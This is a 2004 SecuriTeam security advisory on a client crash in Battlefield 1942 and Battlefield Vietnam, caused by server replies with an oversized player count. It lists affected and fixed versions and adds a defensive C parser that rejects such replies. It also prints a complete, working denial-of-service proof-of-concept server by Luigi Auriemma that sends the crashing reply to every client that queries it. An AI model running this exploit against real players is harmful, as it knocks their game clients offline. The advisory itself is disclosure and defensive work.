[NT] Battlefield 1942 and Vietnam Broadcast Client Crash

From: SecuriTeam (support_at_securiteam.com)
Date: 12/12/04

    To: list@securiteam.com
    Date: 12 Dec 2004 10:28:14 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Battlefield 1942 and Vietnam Broadcast Client Crash


    Battlefield 1942 and Vietnam are two of the best-known and most-played FPS
    games based on their respective military conflicts. They are developed by
    <http://www.dice.se> Digital Illusions and were released in September 2002
    and March 2004 respectively.

    A vulnerability in the way Battlefield 1942 and Vietnam parse incoming
    data allows an attacker to cause the program to crash.


    Vulnerable Systems:
     * Battlefield 1942 versions 1.6.19 and prior
     * Battlefield Vietnam versions 1.2 and prior

    Immune Systems:
     * Battlefield 1942 version 1.6.1b
     * Battlefield Vietnam version 1.21b

    Just like any other multiplayer game, Battlefield contacts a master
    server and queries it in order to discover the existing game servers.
    The client then queries each of the game servers for information about
    the game it hosts, which is displayed in the in-game browser.

    A problem exists while parsing the replies from game servers. When a
    server reports a very large number of players (the "numplayers"
    parameter) to the client, the client freezes completely and, a few
    seconds later, faults on a NULL pointer access.

    This is a passive broadcast attack in which an attacker is able to crash
    any client to which the attacker's server is visible.
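    The root cause is a client that trusts the "numplayers" value in the
    backslash-delimited "\key\value\...\final\" reply. The following parser is
    an added example written for this advisory page, not code from the
    advisory or from the game: it reads the same reply format and refuses the
    reply when a player count is non-numeric, exceeds an assumed sanity cap
    (MAX_SANE_PLAYERS, a value chosen here, not taken from the game) or is
    larger than maxplayers, so the oversized value described above is dropped
    before it reaches the browser. The sample replies are constructed, not
    captured traffic.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed sanity cap on player counts; not a value taken from the game. */
#define MAX_SANE_PLAYERS 256UL
#define MAX_FIELD 128
#define MAX_REPLY 2048

typedef struct {
    char hostname[MAX_FIELD];
    char mapname[MAX_FIELD];
    unsigned long numplayers;
    unsigned long maxplayers;
    int have_numplayers;
    int have_maxplayers;
} server_info_t;

/* Parse an unsigned decimal field under a cap. Returns 0 on success, -1 on
 * empty input, sign characters, trailing junk, overflow or a value above cap.
 * The advisory's numplayers of 2147483647 fails the cap check. */
static int parse_bounded_ulong(const char *s, unsigned long cap, unsigned long *out) {
    char *end;
    unsigned long v;

    if (*s == '\0' || *s == '-' || *s == '+') return -1;
    errno = 0;
    v = strtoul(s, &end, 10);
    if (errno == ERANGE || *end != '\0') return -1;
    if (v > cap) return -1;
    *out = v;
    return 0;
}

/* Parse a "\key\value\...\final\" server-info reply into *info.
 * Returns 0 if the reply is acceptable and -1 if the client should drop it:
 * malformed framing, missing player counts, a count above the cap, or
 * numplayers larger than maxplayers. */
int parse_server_reply(const char *reply, size_t len, server_info_t *info) {
    char buf[MAX_REPLY];
    char *p, *key, *val;

    if (reply == NULL || info == NULL || len >= sizeof buf) return -1;
    memcpy(buf, reply, len);
    buf[len] = '\0';
    memset(info, 0, sizeof *info);

    if (buf[0] != '\\') return -1;            /* every field starts with '\' */
    p = buf + 1;
    while (*p != '\0') {
        key = p;
        /* "final" is the end-of-reply marker and carries no value. */
        if (strncmp(key, "final", 5) == 0 && (key[5] == '\\' || key[5] == '\0')) break;

        val = strchr(key, '\\');
        if (val == NULL) return -1;           /* key without terminating '\' */
        *val++ = '\0';
        p = strchr(val, '\\');
        if (p == NULL) return -1;             /* value without terminating '\' */
        *p++ = '\0';

        if (strcmp(key, "numplayers") == 0) {
            if (parse_bounded_ulong(val, MAX_SANE_PLAYERS, &info->numplayers) != 0) return -1;
            info->have_numplayers = 1;
        } else if (strcmp(key, "maxplayers") == 0) {
            if (parse_bounded_ulong(val, MAX_SANE_PLAYERS, &info->maxplayers) != 0) return -1;
            info->have_maxplayers = 1;
        } else if (strcmp(key, "hostname") == 0) {
            snprintf(info->hostname, sizeof info->hostname, "%s", val);  /* truncates safely */
        } else if (strcmp(key, "mapname") == 0) {
            snprintf(info->mapname, sizeof info->mapname, "%s", val);
        }
        /* Unknown keys are ignored rather than trusted. */
    }

    if (!info->have_numplayers || !info->have_maxplayers) return -1;
    if (info->numplayers > info->maxplayers) return -1;
    return 0;
}

/* 1 if the reply would be shown in the browser, 0 if it is dropped. */
int reply_is_accepted(const char *reply) {
    server_info_t info;
    return parse_server_reply(reply, strlen(reply), &info) == 0;
}

/* Constructed sample replies (not captured traffic). */
const char *const SAMPLE_BENIGN =
    "\\gamename\\bfield1942\\gamever\\1.6\\hostname\\lan-box\\mapname\\aberdeen"
    "\\numplayers\\12\\maxplayers\\64\\final\\";
const char *const SAMPLE_CRASH =
    "\\gamename\\bfield1942\\gamever\\1.6\\hostname\\crash\\mapname\\aberdeen"
    "\\numplayers\\2147483647\\maxplayers\\2147483647\\final\\";

int main(void) {
    printf("benign reply accepted: %d\n", reply_is_accepted(SAMPLE_BENIGN));  /* 1 */
    printf("crash reply accepted:  %d\n", reply_is_accepted(SAMPLE_CRASH));   /* 0 */
    return 0;
}
```

    The cap is deliberately enforced at parse time rather than at display
    time: the advisory's crash happens after the count is accepted, so the
    only safe point to reject it is before any allocation or indexing is done
    with it. A real client would also need to bound its own read buffer, which
    parse_server_reply does by refusing replies longer than MAX_REPLY.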

    Proof of concept code for this denial of service vulnerability is listed
    below.

    Proof Of Concept

    by Luigi Auriemma


    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    #ifdef WIN32
        #include <winsock.h>
        #include "winerr.h"        /* author's helper header: provides std_err() on Windows */

        #define close closesocket
        typedef int socklen_t;     /* winsock.h does not define socklen_t */
    #else
        #include <unistd.h>
        #include <sys/socket.h>
        #include <sys/types.h>
        #include <arpa/inet.h>
        #include <netinet/in.h>
        #include <netdb.h>
    #endif

    #define VER "0.1"
    #define BUFFSZ 2048
    #define BOOMPLAYERS 2147483647 /* BUG: the oversized player count that crashes the client */
    #define BOOM "\\gamename\\%s" \
                 "\\gamever\\1.6" \
                 "\\location\\0" \
                 "\\hostname\\crash" \
                 "\\hostport\\%d" \
                 "\\mapname\\aberdeen" \
                 "\\numplayers\\%u" \
                 "\\maxplayers\\%u" /* not needed to be the same value */ \
                 "\\final\\"

    void std_err(void);

    int main(int argc, char *argv[]) {
        struct sockaddr_in peer;
        int sd,
            len,
            pcklen,
            on = 1;
        socklen_t psz;
        u_short port;
        u_char buff[BUFFSZ + 1],
               pck[BUFFSZ + 1];

        setbuf(stdout, NULL);

        fputs("\n"
            "Battlefield broadcast client crash "VER"\n"
            " 1942 <= 1.6.19 and Vietnam <= 1.2\n"
            "by Luigi Auriemma\n"
            "e-mail: aluigi@altervista.org\n"
            "web: http://aluigi.altervista.org\n"
            "\n", stdout);

        if(argc < 3) {
            printf("\n"
                "Usage: %s <game> <port>\n"
                " bfvietnam = Battlefield Vietnam\n"
                " bfield1942 = Battlefield 1942\n"
                " bfield1942sw = Battlefield 1942: Secret Weapons of WW2\n"
                " bfield1942rtr = Battlefield 1942: Road to Rome\n"
                " bfield1942swd = Battlefield 1942: Secret Weapons of WW2 Demo\n"
                " bfield1942d = Battlefield 1942 Demo\n"
                " 23000 = default Internet port\n"
                " 22000 = default LAN port\n"
                "\n", argv[0]);
            exit(1);
        }

    #ifdef WIN32
        WSADATA wsadata;
        WSAStartup(MAKEWORD(1,0), &wsadata);
    #endif

        port = atoi(argv[2]);

        /* listen on the chosen UDP port for server-info queries */
        peer.sin_addr.s_addr = INADDR_ANY;
        peer.sin_port = htons(port);
        peer.sin_family = AF_INET;
        psz = sizeof(peer);

        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();

        if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
          < 0) std_err();
        if(bind(sd, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();

        /* build the malformed server-info reply once; %s game, %d port, %u counts */
        pcklen = snprintf((char *)pck, BUFFSZ, BOOM,
            argv[1], port, (unsigned)BOOMPLAYERS, (unsigned)BOOMPLAYERS);
        if((pcklen < 0) || (pcklen > BUFFSZ)) exit(1);

        fputs("Clients:\n", stdout);
        for(;;) {
            /* every querying client gets the same reply back */
            psz = sizeof(peer);
            len = recvfrom(sd, (char *)buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);
            if(len < 0) continue;
            buff[len] = 0x00;

            printf("%16s:%5hu %s\n",
                inet_ntoa(peer.sin_addr), ntohs(peer.sin_port), (char *)buff);

            if(sendto(sd, (char *)pck, pcklen, 0, (struct sockaddr *)&peer, sizeof(peer))
              < 0) std_err();
        }

        close(sd);
        return(0);
    }

    #ifndef WIN32
        void std_err(void) {
            perror("\nError");
            exit(1);
        }
    #endif

    The information has been provided by <mailto:aluigi@autistici.org> Luigi
    Auriemma.


